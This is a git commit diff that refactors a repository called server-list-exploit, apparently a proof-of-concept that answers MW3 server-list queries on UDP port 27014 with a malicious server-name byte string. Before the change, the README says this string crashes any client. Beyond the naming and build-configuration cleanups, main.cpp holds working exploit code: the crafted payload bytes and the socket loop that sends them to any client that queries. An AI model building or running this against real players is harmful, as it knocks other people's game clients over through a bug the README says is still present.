clean up this project

2025-04-19 12:32:52 +00:00 · 2022-09-07 14:39:21 +02:00 · 2022-09-07 14:39:21 +02:00 · 12c0d485e0
commit 12c0d485e0
parent 163587cdbc
10 changed files with 133 additions and 149 deletions
--- a/README.md
+++ b/README.md
@ -11,17 +11,10 @@ The exploit has since been mitigated, but the underlying bug in the client remai
 ## How does this work?
-The exploit works by modifying the server name with a malicious string of characters. It will make any client crash.
+The exploit works by modifying the server name with a malicious string of characters.
 ## Compile from source
 - Clone the Git repo. Do NOT download it as ZIP, that won't work.
 - Run `premake5 vs2019` or simply use the delivered `generate.bat`.
 - Build via solution file in `build\server-list-exploit.sln`.
 ## Premake arguments
 | Argument                    | Description                                    |
 |:----------------------------|:-----------------------------------------------|
 | `--dev-build`            | Do nothing. |
 | `--copy-to`              | Copy the EXE to a custom folder after build. |
--- a/generate.bat
+++ b/generate.bat
@ -1,3 +1,3 @@
@echo off
 git submodule update --init --recursive
-tools\premake5 %* vs2019
+call tools\premake5 %* vs2022
--- a/premake5.lua
+++ b/premake5.lua
@ -42,14 +42,18 @@ newoption {
 dependencies.load()
 workspace "server-list-exploit"
 startproject "server-list-exploit"
 location "./build"
 objdir "%{wks.location}/obj"
 targetdir "%{wks.location}/bin/%{cfg.platform}/%{cfg.buildcfg}"
 configurations {"Debug", "Release"}
 language "C++"
 cppdialect "C++17"
 architecture "x86"
-platforms "x86"
+platforms "Win32"
 systemversion "latest"
 symbols "On"
@ -64,43 +68,35 @@ end
 flags {"NoIncrementalLink", "NoMinimalRebuild", "MultiProcessorCompile", "No64BitChecks" }
-filter "action:vs*"
+filter "platforms:Win*"
 buildoptions "/std:c++17"
 	defines {"_WINDOWS", "WIN32"}
 filter {}
-filter "action:gmake*"
+filter "configurations:Release"
 cppdialect "C++17"
 buildoptions "-std=c++17"
 defines { "_LINUX" }
 configuration "Release"
 	optimize "Size"
 	buildoptions {"/GL"}
 	linkoptions {"/IGNORE:4702", "/LTCG"}
 	defines {"NDEBUG"}
 	flags {"FatalCompileWarnings", "FatalLinkWarnings"}
 filter {}
-flags {"FatalCompileWarnings"}
+filter "configurations:Debug"
 configuration "Debug"
 	optimize "Debug"
 	defines {"DEBUG", "_DEBUG"}
-
+filter {}
 configuration {}
 project "server-list-exploit"
 kind "ConsoleApp"
 language "C++"
 pchheader "stdinc.hpp"
 pchsource "src/stdinc.cpp"
 files {"./src/**.hpp", "./src/**.cpp"}
 includedirs {"./src", "%{prj.location}/src"}
-- links {"kernel32", "user32", "Ws2_32"}
+resincludedirs {"$(ProjectDir)src"}
 pchheader "stdafx.hpp"
 pchsource "src/stdafx.cpp"
 dependencies.imports()
--- a/src/main.cpp
+++ b/src/main.cpp
@ -1,18 +1,18 @@
-#include "stdinc.hpp"
+#include "stdafx.hpp"
 #include "main.hpp"
 #define MW3_SERVER_4CC 0x504F4F4C
 #define BUF_SIZE 1024
-SOCKET sock;
+static SOCKET sock;
-bool startUp()
+bool start_up()
 {
 	WSADATA wsa_data;
-    auto wsaResult = WSAStartup(MAKEWORD(2, 2), &wsa_data);
+	const auto wsa_result = WSAStartup(MAKEWORD(2, 2), &wsa_data);
-    if (wsaResult != 0)
+	if (wsa_result != 0)
 	{
-        printf("WSAStartup error: %d\n", wsaResult);
+		printf("WSAStartup error: %d\n", wsa_result);
 		return false;
 	}
@ -29,7 +29,7 @@ bool startUp()
 //	net_masterServerPort
 	service.sin_port = htons(27014);
-    auto result = bind(sock, (SOCKADDR*)&service, sizeof(service));
+	const auto result = bind(sock, (SOCKADDR*)&service, sizeof(service));
 	if (SOCKET_ERROR == result)
 	{
 		printf("Can't bind socket\n");
@ -41,31 +41,30 @@ bool startUp()
 	return true;
 }
-DWORD WINAPI recvTh(LPVOID)
+DWORD WINAPI recv_thread(LPVOID)
 {
-    auto buf = std::make_unique<char[]>(BUF_SIZE);
+	auto msg_buf = std::make_unique<char[]>(BUF_SIZE);
 	printf("Started thread\n");
-    u_long iMode = 0;
+	u_long i_mode = 0;
-    auto ioctlResult = ioctlsocket(sock, FIONBIO, &iMode);
+	const auto ioctl_result = ioctlsocket(sock, FIONBIO, &i_mode);
-    if (ioctlResult != 0)
+	if (ioctl_result == SOCKET_ERROR)
 	{
-        printf("ioctlsocket error: %d\n", ioctlResult);
+		printf("ioctlsocket error: %d\n", ioctl_result);
 		return 1;
 	}
-    sockaddr_in sender{};
+	static sockaddr_in sender{};
-    int senderSize = sizeof(sender);
+	static serverInfo_t info{};
    serverInfo_t info{};
-//  undisclosed step
+//	simplified step for this POC
 	info.serverName_ptr = 0;
 	info.rawDataSize = INFO_MAX_DATA;
-    while (TRUE)
+	while (true)
 	{
-        SecureZeroMemory(buf.get(), BUF_SIZE);
+		int sender_size = sizeof(sender);
-        auto len = recvfrom(sock, buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &senderSize);
+		const auto len = recvfrom(sock, msg_buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &sender_size);
 		if (len == SOCKET_ERROR)
 		{
@ -74,7 +73,7 @@ DWORD WINAPI recvTh(LPVOID)
 		if (len == sizeof(serverQuery_t))
 		{
-            auto* packet = (serverQuery_t*)buf.get();
+			const auto* packet = (serverQuery_t*)msg_buf.get();
 			if (packet->magic4CC == MW3_SERVER_4CC)
 			{
@ -82,7 +81,7 @@ DWORD WINAPI recvTh(LPVOID)
 				auto bad_string = "\x5e\x01\xCC\xCC\x0C" "depthprepass"s;
 //				auto bad_string = "\x5e\x01\xCC\xCC\x0A" "shellshock"s;
 				std::memcpy(&info.rawData[info.serverName_ptr], bad_string.data(), bad_string.length() + 1);
-                sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, senderSize);
+				sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, sender_size);
 			}
 		}
@ -94,14 +93,14 @@ DWORD WINAPI recvTh(LPVOID)
 int main(int, char**)
 {
-    if (!startUp())
+	if (!start_up())
 	{
 		return 1;
 	}
-    DWORD dwThreadId;
+	DWORD dw_thread_id;
-    auto thread = CreateThread(0, 0, recvTh, 0, 0, &dwThreadId);
+	auto thread = CreateThread(nullptr, 0, recv_thread, nullptr, 0, &dw_thread_id);
-    if (thread == NULL)
+	if (thread == nullptr)
 	{
 		printf("Error in creating thread\n");
 		return 1;
--- a/src/main.hpp
+++ b/src/main.hpp
@ -2,6 +2,7 @@
 #define INFO_MAX_DATA 2048
 // MW3 Client Specific Structures
 #pragma pack(1)
 typedef struct
--- a/src/stdafx.cpp
+++ b/src/stdafx.cpp
@ -0,0 +1 @@
 #include "stdafx.hpp"
--- a/src/stdafx.hpp
+++ b/src/stdafx.hpp
@ -0,0 +1,24 @@
 #ifdef _WIN32
 #pragma once
 #define WIN32_LEAN_AND_MEAN
 #include <Windows.h>
 #include <WinSock2.h>
 #include <WS2tcpip.h>
 #endif
 #include <string>
 #include <vector>
 #include <iostream>
 #include <memory>
 #include <string>
 #ifdef _WIN32
 #pragma comment (lib, "Ws2_32.lib")
 #endif
 using namespace std::literals;
--- a/src/stdinc.cpp
+++ b/src/stdinc.cpp
@ -1 +0,0 @@
 #include "stdinc.hpp"
--- a/src/stdinc.hpp
+++ b/src/stdinc.hpp
@ -1,29 +0,0 @@
 #ifdef _LINUX
 #pragma clang diagnostic push
 #pragma clang diagnostic ignored "-Wpragma-pack"
 #endif
 // defines
 #define WIN32_LEAN_AND_MEAN
 // windows headers
 #include <WinSock2.h>
 #include <ws2tcpip.h>
 #include <windows.h>
 #include <string>
 #include <vector>
 #include <iostream>
 #include <memory>
 #pragma comment (lib, "Ws2_32.lib")
 // std includes
 #include <string>
 using namespace std::literals;
 // c types
 #include <cstdint>
 #ifdef _LINUX
 #pragma clang diagnostic pop
 #endif
--- a/tools/premake5.exe
+++ b/tools/premake5.exe